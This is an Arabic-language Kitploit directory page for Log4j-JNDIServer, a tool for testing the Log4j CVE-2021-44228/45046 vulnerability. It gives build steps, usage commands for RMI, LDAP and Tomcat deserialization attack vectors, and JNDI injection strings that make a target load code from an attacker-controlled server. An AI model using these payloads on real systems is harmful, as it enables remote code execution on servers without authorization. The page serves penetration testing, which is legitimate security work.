Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Log4j-JNDIServer — سيساعد هذا المشروع في اختبار ثغرة Log4j CVE-2021-44228. | Kitploit
أدوات/GitHubGitHub/immunityinc/log4j-jndiserver
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

سيساعد هذا المشروع في اختبار ثغرة Log4j CVE-2021-44228.

عرض المستودع
92منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Log4j-JNDIServer

سيساعدك هذا المشروع في اختبار الثغرات الأمنية Log4j CVE-2021-44228/CVE-2021-45046.

التثبيت والبناء

  • قم بتحميل المشروع في Intellij Idea
  • اختر JDK في "Project Settings" (CTRL + ALT + SHIFT + S)
  • في "Project Settings"، أنشئ Artifact -> "Artifacts" -> "Create JAR from Modules" -> في "JAR files from libraries"، ضع علامة "extract to target JAR" -> "OK"
  • قم ببناء المشروع (CTRL + F9). سيؤدي هذا إلى إنشاء ملف jar في المجلد /out/artifacts/

البناء باستخدام Maven

يتطلب Java 1.8+ و Maven 3.x+

  • mvn clean package -DskipTests
  • ستجد ملف .jar في المجلد /target

الاستخدامات

1. ناقل الهجوم RMI

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

لم تعد بحاجة إلى استضافة ملف Exploit.class. سيقوم التطبيق بتشغيل خادم HTTP على المنفذ المحدد.

يجب عليك تحديد الأمر الذي تريد تشغيله في الهدف.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2. ناقل الهجوم LDAP

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

لم تعد بحاجة إلى استضافة ملف Exploit.class. سيقوم التطبيق بتشغيل خادم HTTP على المنفذ المحدد.

يجب عليك تحديد الأمر الذي تريد تشغيله في الهدف.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3. ناقل هجوم إزالة التسلسل (باستخدام حمولة Tomcat)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

مثال

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
تنزيل الأداة